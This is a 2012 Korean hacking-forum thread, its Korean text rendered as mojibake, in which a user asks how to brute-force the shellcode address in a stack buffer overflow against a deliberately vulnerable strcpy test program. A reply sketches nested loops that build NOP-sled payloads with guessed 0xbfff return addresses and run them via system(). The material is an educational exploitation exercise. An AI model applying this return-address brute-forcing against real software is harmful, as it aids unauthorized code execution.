½Ã½ºÅÛ ÇØÅ·

 1574, 16/79 ȸ¿ø°¡ÀÔ  ·Î±×ÀΠ 
   hihi2623
   ¹öÆÛ¿À¹öÇ÷οì brute force ¿¡°üÇؼ­...

http://www.hackerschool.org/HS_Boards/zboard.php?desc=asc&no=1616 [º¹»ç]


¹öÆÛ¿À¹öÇ÷οì½Ã ¸¸¾à test ¶ó´Â Ãë¾àÇÁ·Î±×·¥ÀÌ ÀÖ½À´Ï´Ù.

--test---
int main(int argc,char* argv[])
{
   char buffer[40];
   strcpy(buffer,argv[1]);
}

±Ùµ¥ ÀÌ ÇÁ·Î±×·¥À» °ø°ÝÇϱâÀ§Çؼ­

./test `perl -e 'print "a"x40,"\x??\x??\x??\x??"'`
                    --½©ÄÚµå+NOP-- + ½©ÄÚµåÀÇ ÁÖ¼Ò°ª

ÀÌ·±½ÄÀ¸·Î ¹öÆÛ¿À¹öÇ÷ο츦 ½ÃÅ°Àݾƿä?

±Ùµ¥ ÀÌ°É ½©Äڵ尡 µé¾îÀÖ´Â ¸Þ¸ð¸®ÁÖ¼Ò¸¦ ã´Â brute force ¾îÅÃÀ» ÇÏ´Â ÇÁ·Î±×·¥À» Â¥·Á¸é ¾î¶»°Ô ÇؾßÇϳª¿ä??

¹°·Ð gdb·Î ºÐ¼®Çؼ­ ÇÒÁÙÀº ¾Ð´Ï´Ù¸¸... brute force °ø°ÝÀ» ÇÒ¶§ ¾î¶»°Ô ¼Ò½º¸¦ Â¥´ÂÁö ±Ã±ÝÇؼ­ ±×·´´Ï´Ù¤Ð¤Ð

char* ptr=0xa;
char temp[100];
sprintf(temp,"./test `perl -e 'print \"%c\"'`",ptr);
system(temp);

Á÷Á¢ Ä¡´Â°Å¶û ½©¿¡ Àü´ÞµÇ´Â°Ô ´Ù¸¥°Å °°½À´Ï´Ù..¤Ð¤Ð  Á¦¹ß Àú¿¡°Ô Áö½ÄÀ» ¾Ë·ÁÁÖ¼¼¿ä~

`perl -e 'print "\x??\x??\x??\x??"'`   <- À̰Ŷû ¶È°°Àº ±â´ÉÀ» ÇÏ°í ¹°À½Ç¥¸¦ ·£´ýÀ¸·Î µ¹¸±¼öÀÖ´Â

ÇÁ·Î±×·¥ ¼Ò½º¸¦ ÂÍ Â¥ÁÖ¼¼¿ä

  Hit : 3233     Date : 2012/10/15 06:57



    
cd80 \x~~ Çü½ÄÀ¸·Î Àü´ÞÇÏ´Â°Ô Å°º¸µå·Î Ç¥Çö ºÒ°¡´ÉÇÑ ¹®ÀÚ¸¦ »ý¼ºÇØ ÇÁ·Î±×·¥¿¡ ³Ö¾îÁÖ·Á°í Çϴ°ÍÀä
°á±¹ \x \x \x ÇϳªÇϳª°¡ 1¹ÙÀÌÆ® char ÇüÀÔ´Ï´Ù
while ¹® µ¹¸®½Ã¸é¼­
½ºÅÃÀ¸·Î ¸®ÅÏÇÏ´Â °æ¿ì ¾Õ µÎ¹ÙÀÌÆ®°¡ 0xbfff ȤÀº 0xbffe ÀÎ°Ô ´ëºÎºÐÀ̱⠶§¹®¿¡ (·¹µåÇÞ 6.2 ±âÁØ)
¶Ç ±× ¾Æ·¡¿¡ while µÎ°³³ª for¹® µÎ°³¸¦ »ç¿ëÇϼż­
i=255
j=255
for i > 0
for j > 0
sprintf(temp, "./test `perl -e 'print \"\\x90\" x 200, \"%c%c\\xff\\xbf\"'`", i, j);
system(temp);
if (j=1){ i = 255; j -=1; }

end for j
end for i

ÀÌ·±½ÄÀ¸·Î ÇÏ½Ã¸é µÉ°Í°°½À´Ï´Ù
2012/10/15  
1274   NC¼ÒÇÁÆ®¸¦ »ó´ë·Î ¼Ò¼Û ÁغñÁß¿¡ ÀÖ½À´Ï´Ù.      TOGEACE
12/09 3391
1273   ½Ã½ºÅÛ ÇØÅ·À» ÇÏ¸é ¹«¾ùÀÌ ÀÌÀÍÀΰ¡¿ä? [2]     ¹ÎÁÖÈ­
11/24 3258
1272   À©µµ¿ì7 º¸¾È Áú¹®µå¸³´Ï´Ù     ch0b0
11/09 3175
1271   [bof] ¹öÆÛ¿À¹öÇ÷οì Áú¹®ÀÌ¿ä ½ºÆ÷ÁÖÀ§[2]     yj6393
11/05 3024
1270   ¹öÆÛ¿À¹öÇÃ·Î¿ì °ü·Ã Áú¹®[2]     pk920207
11/02 2911
1269   BOF¿¡¼­ ÀÎÀÚ ÀÔ·ÂÇÒ¶§...[2]     ¸®´ª½ºÆë±Ï
10/27 3456
1268   ½ºÅÿ¡ ´ëÇؼ­[2]     GTzad
10/20 3067
1267   Áö±Ý ftz ¸·ÇôÀÖ³ª¿ä?     pyg9128
10/18 3236
  ¹öÆÛ¿À¹öÇ÷οì brute force ¿¡°üÇؼ­...[1]     hihi2623
10/15 3232
1265     [re] ¹öÆÛ¿À¹öÇ÷οì brute force ¿¡°üÇؼ­...     hihi2623
10/15 2675
1264   ÇØÄ¿½ºÄð¿¡¼­ Á¦°øÇÏ´Â BOF º¸°í ÇÏ´øµµÁß Áú¹®ÀÔ´Ï´Ù.     tjzmfls
10/11 2896
1263   Rainbow table ¾Æ½Ã´ÂºÐ ÀÖ³ª¿ä ¤Ð¤Ð?     ingod0707
10/07 2445
1262   ½©ÄÚµå ¸¸µé±â Segmentation fault..[1]     attainer
09/20 4558
1261   ·¹Áö½ºÅÍ °ü·Ã Áú¹®ÀÔ´Ï´Ù![1]     °¡³ªÇϺñ
09/18 2820
1260   Çб³¿¡¼­ atmega128À» ¹è¿ì°íÀִµ¥...(´ëÇлýÀÔ´Ï´Ù)     X-line
09/14 3015
1259   netbot attacker VIP 5.5[2]     ÇØÄ¿ Hades
09/08 15785
1258   ¹Ø¿¡ ±Û¿¡¼­ ZERO´ÔÀÌ ´äº¯ÇØÁֽñä Çߴµ¥ ¾ÈµÇ³×¿ä¤Ð¤Ð¤Ð[1]     kevin961119
09/07 2802
1257   Á¦¹ß ¾Ë·ÁÁÖ¼¼¿ä[2]     kevin961119
09/06 3471
1256   ¿©±â ¿Ã¸®´Â°ÇÁö ¸ð¸£°Ú´Âµ¥ ±×³ª¸¶ °¡Àå °¡±î¿ö¼­ ¿Ã¸³´Ï´Ù. Á¦¹ß ¾Ë·ÁÁÖ¼¼¿ä     kevin961119
09/04 3380
1255   Á»ºñpc     ÇØÄ¿ Hades
09/02 3192
[1]..[11][12][13][14][15] 16 [17][18][19][20]..[79]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org